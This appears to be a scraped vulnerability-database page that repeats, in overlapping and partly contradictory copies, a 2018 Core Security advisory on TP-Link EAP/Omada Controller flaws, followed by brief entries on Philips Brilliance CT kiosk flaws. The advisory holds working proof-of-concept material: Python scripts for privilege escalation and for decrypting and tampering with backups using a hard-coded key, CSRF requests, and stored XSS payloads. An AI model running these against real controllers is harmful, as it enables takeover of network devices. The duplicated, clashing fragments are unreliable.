TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa Connection: close Upgrade-Insecure-Requests: 1 name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator -----/ 7.4. **Cross-Site Scripting in the creation of a local User** [CVE-2018-10165] The following parameter of the local user creation is vulnerable to a stored Cross Site Scripting: userName The following is a proof of concept to demonstrate the vulnerability: /----- POST /hotspot/localUser/saveUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en Connection: close Upgrade-Insecure-Requests: 1 userName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=123456 -----/ 7.5. **Cross-Site Scripting in portalPictureUpload** [CVE-2018-10164] The implementation of portalPictureUpload can be abused and leads to a stored Cross Site Scripting. Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB) In the following example we encode "<script>alert(1)</script>" in base64, the results is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" so we replace the fileData with the code and restore the backup file. /----- <picturefiles> <file> <fileId>5a383b962dc07622f0bdc101</fileId> <fileData>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</fileData> </file> </picturefiles> -----/ To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId used in the example). 8. **Report Timeline** 2018-01-12: Core Security sent an initial notification to TP-LINK, asking for GPG keys in order to send draft advisory. 2018-01-14: TP-Link answered asking for the advisory in clear text. 2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form. 2018-01-29: TP-Link informed Core Security they checked the draft advisory and they are going to fix the vulnerabilities. 2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and request an estimated release date for the fix. 2018-02-07: TP-Link informed that they were working in a beta version of the fix and they will provide it to Core Security for test. 2018-02-07: Core Security thanked TP-Link's answer and asked for a tentative date for this beta version. Also, Core Security asked for a tentative release date for the fix. 2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again. 2018-03-01: Core Security thanked TP-Link's answer and requested for a regular contact till the release of the fixed version. 2018-03-19: Core Security requested a status update. 2018-03-21: TP-Link confirmed that the new version will be available in early April. 2018-03-26: Core Security thanked TP-Link's reply an asked for a solidified release date. 2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities. 2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed. 2018-04-17: Core Security set release date to be May 3rd at 12 PM EST. 9. **References** [1] https://www.tp-link.com/en/products/details/EAP-Controller.html. [2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software. 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. **PGP/GPG Keys** This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows do not control privileges for usage of the Web API, allowing a low-privilege user to make any request as an Administrator. This is fixed in version 2.6.1_Windows. TP-Link EAP Controller and Omada Controller Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkEAPController and OmadaController are software used by TP-LINK to remotely control wireless AP access point devices. This vulnerability stems from the program's failure to control the use of WebAPI. An attacker could exploit the vulnerability to send a request as an administrator. TP-Link EAP Controller and Omada Controller are prone to the following security vulnerabilities: 1. A privilege-escalation vulnerability 2. A hard-coded cryptographic key vulnerability 3. A cross-site request-forgery vulnerability 4. Multiple HTML-injection vulnerability An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. **Advisory Information** Title: TP-Link EAP Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0001 Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities Date published: 2018-05-03 Date of last update: 2018-04-17 Vendors contacted: TP-Link Release mode: Coordinated release 2. **Vulnerability Information** Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164 3. It allows you to centrally manage your EAP devices using a Web browser. Due to the use of a hard-coded cryptographic key the backup file of the Web application can be decrypted, modified and restored back. Also, the Web application does not have Cross-Site Request Forgery protection and finally, two stored Cross Site Scripting vulnerabilities were found. 4. **Vulnerable Packages** . TP-Link EAP Controller_V2.5.4_Windows . TP-Link Omada Controller_V2.6.0_Windows Other products and versions might be affected, but they were not tested. 5. **Vendor Information, Solutions and Workarounds** TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues. 6. **Credits** This vulnerability was discovered and researched by Julian MuA+-oz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team. 7. **Technical Description / Proof of Concept Code** TP-Link EAP Controller doesn't have any role control on the Web app API, only the application GUI seems to be restricting low lever users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low privilege user (observer) can make a request and create a new administrator user. On 7.2 we show the software uses a hardcoded key to encrypt the Web application's backup file. An attacker possessing such key, and knowing the encryption algorithm would allow the backup file to be decrypted and modified. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices. On 7.3 we show the application does not have any Cross-Site Request Forgery Protection giving an attacker the possibility of forcing an end user to execute any unwanted actions on the EAP Controller in which the victim is currently authenticated. Finally, we discovered two Cross-Site Scripting, one on the creation of a local user in the parameter userName (7.4) and the other one abusing the implementation of portalPictureUpload (7.5). 7.1. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user): /----- import requests session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" #observer session_id cookie = {'TPEAP_SESSIONID': tpeap_session_id} data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"} #create user create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False) -----/ The roleId parameter can be discovered in 7.2 by decrypting the backup file. 7.2.**Download, Decrypt and Restore the web app backup file** [CVE-2018-10167] As described, the whole Web API do not restrict low privilege users, so an observer can make a request to download the web app backup file. The following xml is part of the decrypted backup file, modifying those fields would give us control over the EAP device since we can inject a user and password for the user account and enable SSH on the device. /----- <useraccount> { "id" : "5a09fad8bb62eef169069ad3", "userName" : "attacker", "password" : "1234567", "site" : "Default", "key" : "userAccount" } </useraccount> <ssh> { "id" : "59fb411fbb62eef169069ac7", "sshserverPort" : 22, "sshenable" : true, "site" : "Default", "key" : "ssh" } </ssh> -----/ The following code shows how this process is done, using an observer's session_id. First we get the backup file, decrypt it using the hard-coded key, then we modify it and finally upload it back to the server. /----- # -*- coding: utf-8 -*- import requests import codecs key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \ "3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \ "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX" def init_key(secret_key): key_in_bytes = map(ord, secret_key) number_list = range(0, 256) j = 0 for i, val in enumerate(number_list): j = j + number_list[i] + key_in_bytes[i] & 0xFF temp = number_list[i] number_list[i] = number_list[j] number_list[j] = temp return number_list def encrypt(data, key): key = init_key(key) input = [x for x in data] output = [] for x, elem in enumerate(data): i = 0 j = 0 i = (i + 1) % 256 j = (j + key[i]) % 256 temp = key[i] key[i] = key[j] key[j] = temp t = (key[i] + key[j] % 256) % 256 iY = key[t] iCY = iY output.append(chr(ord(input[x]) ^ iCY)) ret = ''.join(output) return ret session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" cookie = {'TPEAP_SESSIONID': tpeap_session_id} #get backup file get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup', cookies=cookie, verify=False) #decrypt backup file decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key) #modify decrypted backup file patched_backup = decrypted_backup.replace('normaluser', 'attacker') #encrypt the file and save it path_to_write = r"C:\fake_path\patched_backup_from_observer.cfg" encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape') h = codecs.open(path_to_write, "w", encoding='utf-8') h.write(encrypt_patched_backup) h.close() #upload patched backup file files = {'file': open(path_to_write, 'rb')} restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore', files=files, cookies=cookie, verify=False) -----/ 7.3. **Lack of Cross-Site Request Forgery Protection** [CVE-2018-10166] There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attack-controlled domain. Proof of concept to create an Administrator User /----- POST /user/addUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en; TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa Connection: close Upgrade-Insecure-Requests: 1 name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator -----/ 7.4. **Cross-Site Scripting in the creation of a local User** [CVE-2018-10165] The following parameter of the local user creation is vulnerable to a stored Cross Site Scripting: userName The following is a proof of concept to demonstrate the vulnerability: /----- POST /hotspot/localUser/saveUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en Connection: close Upgrade-Insecure-Requests: 1 userName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=123456 -----/ 7.5. **Cross-Site Scripting in portalPictureUpload** [CVE-2018-10164] The implementation of portalPictureUpload can be abused and leads to a stored Cross Site Scripting. Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB) In the following example we encode "<script>alert(1)</script>" in base64, the results is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" so we replace the fileData with the code and restore the backup file. /----- <picturefiles> <file> <fileId>5a383b962dc07622f0bdc101</fileId> <fileData>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</fileData> </file> </picturefiles> -----/ To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId used in the example). 8. **Report Timeline** 2018-01-12: Core Security sent an initial notification to TP-LINK, asking for GPG keys in order to send draft advisory. 2018-01-14: TP-Link answered asking for the advisory in clear text. 2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form. 2018-01-29: TP-Link informed Core Security they checked the draft advisory and they are going to fix the vulnerabilities. 2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and request an estimated release date for the fix. 2018-02-07: TP-Link informed that they were working in a beta version of the fix and they will provide it to Core Security for test. 2018-02-07: Core Security thanked TP-Link's answer and asked for a tentative date for this beta version. Also, Core Security asked for a tentative release date for the fix. 2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again. 2018-03-01: Core Security thanked TP-Link's answer and requested for a regular contact till the release of the fixed version. 2018-03-19: Core Security requested a status update. 2018-03-21: TP-Link confirmed that the new version will be available in early April. 2018-03-26: Core Security thanked TP-Link's reply an asked for a solidified release date. 2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities. 2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed. 2018-04-17: Core Security set release date to be May 3rd at 12 PM EST. 9. **References** [1] https://www.tp-link.com/en/products/details/EAP-Controller.html. [2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software. 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. **PGP/GPG Keys** This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The web application backup file in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows is encrypted with a hard-coded cryptographic key, so anyone who knows that key and the algorithm can decrypt it. A low-privilege user could decrypt and modify the backup file in order to elevate their privileges. This is fixed in version 2.6.1_Windows. TP-Link EAP Controller and Omada Controller Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkEAPController and OmadaController are software used by TP-LINK to remotely control wireless AP access point devices. A security vulnerability exists in the TP-LinkEAPController and the OmadaController 2.5.4_Windows version and the 2.6.0_Windows version of the web application backup file. The vulnerability is caused by the program encrypting with a hard-coded encryption key. TP-Link EAP Controller and Omada Controller are prone to the following security vulnerabilities: 1. A privilege-escalation vulnerability 2. A cross-site request-forgery vulnerability 4. Multiple HTML-injection vulnerability An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. The following products and versions are vulnerable: TP-Link EAP Controller 2.5.4 and 2.6.0 TP-Link Omada Controller 2.5.4 and 2.6.0. **Advisory Information** Title: TP-Link EAP Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0001 Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities Date published: 2018-05-03 Date of last update: 2018-04-17 Vendors contacted: TP-Link Release mode: Coordinated release 2. **Vulnerability Information** Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164 3. It allows you to centrally manage your EAP devices using a Web browser. Vulnerabilities were found in the EAP Controller management software, allowing privilege escalation due to improper privilege management in the Web application. Also, the Web application does not have Cross-Site Request Forgery protection and finally, two stored Cross Site Scripting vulnerabilities were found. 4. **Vulnerable Packages** . TP-Link EAP Controller_V2.5.4_Windows . TP-Link Omada Controller_V2.6.0_Windows Other products and versions might be affected, but they were not tested. 5. **Vendor Information, Solutions and Workarounds** TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues. 6. **Credits** This vulnerability was discovered and researched by Julian MuA+-oz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team. 7. **Technical Description / Proof of Concept Code** TP-Link EAP Controller doesn't have any role control on the Web app API, only the application GUI seems to be restricting low lever users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low privilege user (observer) can make a request and create a new administrator user. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices. On 7.3 we show the application does not have any Cross-Site Request Forgery Protection giving an attacker the possibility of forcing an end user to execute any unwanted actions on the EAP Controller in which the victim is currently authenticated. Finally, we discovered two Cross-Site Scripting, one on the creation of a local user in the parameter userName (7.4) and the other one abusing the implementation of portalPictureUpload (7.5). 7.1. **Privilege escalation from Observer to Administrator** [CVE-2018-10168] The software does not control privileges on the usage of the Web API, allowing a low privilege user to make any request as an Administrator. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user): /----- import requests session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" #observer session_id cookie = {'TPEAP_SESSIONID': tpeap_session_id} data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"} #create user create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False) -----/ The roleId parameter can be discovered in 7.2 by decrypting the backup file. The following xml is part of the decrypted backup file, modifying those fields would give us control over the EAP device since we can inject a user and password for the user account and enable SSH on the device. /----- <useraccount> { "id" : "5a09fad8bb62eef169069ad3", "userName" : "attacker", "password" : "1234567", "site" : "Default", "key" : "userAccount" } </useraccount> <ssh> { "id" : "59fb411fbb62eef169069ac7", "sshserverPort" : 22, "sshenable" : true, "site" : "Default", "key" : "ssh" } </ssh> -----/ The following code shows how this process is done, using an observer's session_id. /----- # -*- coding: utf-8 -*- import requests import codecs key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \ "3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \ "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX" def init_key(secret_key): key_in_bytes = map(ord, secret_key) number_list = range(0, 256) j = 0 for i, val in enumerate(number_list): j = j + number_list[i] + key_in_bytes[i] & 0xFF temp = number_list[i] number_list[i] = number_list[j] number_list[j] = temp return number_list def encrypt(data, key): key = init_key(key) input = [x for x in data] output = [] for x, elem in enumerate(data): i = 0 j = 0 i = (i + 1) % 256 j = (j + key[i]) % 256 temp = key[i] key[i] = key[j] key[j] = temp t = (key[i] + key[j] % 256) % 256 iY = key[t] iCY = iY output.append(chr(ord(input[x]) ^ iCY)) ret = ''.join(output) return ret session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" cookie = {'TPEAP_SESSIONID': tpeap_session_id} #get backup file get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup', cookies=cookie, verify=False) #decrypt backup file decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key) #modify decrypted backup file patched_backup = decrypted_backup.replace('normaluser', 'attacker') #encrypt the file and save it path_to_write = r"C:\fake_path\patched_backup_from_observer.cfg" encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape') h = codecs.open(path_to_write, "w", encoding='utf-8') h.write(encrypt_patched_backup) h.close() #upload patched backup file files = {'file': open(path_to_write, 'rb')} restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore', files=files, cookies=cookie, verify=False) -----/ 7.3. **Lack of Cross-Site Request Forgery Protection** [CVE-2018-10166] There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attack-controlled domain. Proof of concept to create an Administrator User /----- POST /user/addUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en; TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa Connection: close Upgrade-Insecure-Requests: 1 name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator -----/ 7.4. **Cross-Site Scripting in the creation of a local User** [CVE-2018-10165] The following parameter of the local user creation is vulnerable to a stored Cross Site Scripting: userName The following is a proof of concept to demonstrate the vulnerability: /----- POST /hotspot/localUser/saveUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en Connection: close Upgrade-Insecure-Requests: 1 userName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=123456 -----/ 7.5. **Cross-Site Scripting in portalPictureUpload** [CVE-2018-10164] The implementation of portalPictureUpload can be abused and leads to a stored Cross Site Scripting. Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB) In the following example we encode "<script>alert(1)</script>" in base64, the results is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" so we replace the fileData with the code and restore the backup file. /----- <picturefiles> <file> <fileId>5a383b962dc07622f0bdc101</fileId> <fileData>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</fileData> </file> </picturefiles> -----/ To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId used in the example). 8. **Report Timeline** 2018-01-12: Core Security sent an initial notification to TP-LINK, asking for GPG keys in order to send draft advisory. 2018-01-14: TP-Link answered asking for the advisory in clear text. 2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form. 2018-01-29: TP-Link informed Core Security they checked the draft advisory and they are going to fix the vulnerabilities. 2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and request an estimated release date for the fix. 2018-02-07: TP-Link informed that they were working in a beta version of the fix and they will provide it to Core Security for test. 2018-02-07: Core Security thanked TP-Link's answer and asked for a tentative date for this beta version. 2018-02-19: Core Security tested the beta version and verified that all the vulnerabilities were fixed. Also, Core Security asked for a tentative release date for the fix. 2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again. 2018-03-01: Core Security thanked TP-Link's answer and requested for a regular contact till the release of the fixed version. 2018-03-19: Core Security requested a status update. 2018-03-21: TP-Link confirmed that the new version will be available in early April. 2018-03-26: Core Security thanked TP-Link's reply an asked for a solidified release date. 2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities. 2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed. 2018-04-17: Core Security set release date to be May 3rd at 12 PM EST. 9. **References** [1] https://www.tp-link.com/en/products/details/EAP-Controller.html. [2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software. 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. **PGP/GPG Keys** This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Vulnerabilities within the Philips Brilliance CT kiosk environment (Brilliance 64 version 2.6.2 and prior, Brilliance iCT versions 4.1.6 and prior, Brillance iCT SP versions 3.2.4 and prior, and Brilliance CT Big Bore 2.3.5 and prior) could enable a limited-access kiosk user or an unauthorized attacker to break-out from the containment of the kiosk environment, attain elevated privileges from the underlying Windows OS, and access unauthorized resources from the operating system. plural Philips The product contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Philips Brilliance64 and others are CT scanners from Philips, the Netherlands. There are security holes in the kiosk environment in several Philips BrillianceCT devices. Philips Brilliance Computed Tomography Systems are prone to the following security vulnerabilities: 1. A local privilege-escalation vulnerability. 2. Multiple local information-disclosure vulnerabilities An attacker may leverage these issues to obtain sensitive information, gain elevated privileges; this can result in arbitrary code execution within the context of the vulnerable application. Failed exploit attempts will likely cause denial-of-service conditions. Philips Brilliance 64 etc

Philips Brilliance CT devices operate user functions from within a contained kiosk in a Microsoft Windows operating system. Windows boots by default with elevated Windows privileges, enabling a kiosk application, user, or an attacker to potentially attain unauthorized elevated privileges in Brilliance 64 version 2.6.2 and prior, Brilliance iCT versions 4.1.6 and prior, Brillance iCT SP versions 3.2.4 and prior, and Brilliance CT Big Bore 2.3.5 and prior. Also, attackers may gain access to unauthorized resources from the underlying Windows operating system. plural Philips The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Philips Brilliance64 and others are CT scanners from Philips, the Netherlands. There are security holes in several Philips BrillianceCT devices. Philips Brilliance Computed Tomography Systems are prone to the following security vulnerabilities: 1. A local privilege-escalation vulnerability. 2. Multiple local information-disclosure vulnerabilities An attacker may leverage these issues to obtain sensitive information, gain elevated privileges; this can result in arbitrary code execution within the context of the vulnerable application. Failed exploit attempts will likely cause denial-of-service conditions. Philips Brilliance 64 etc

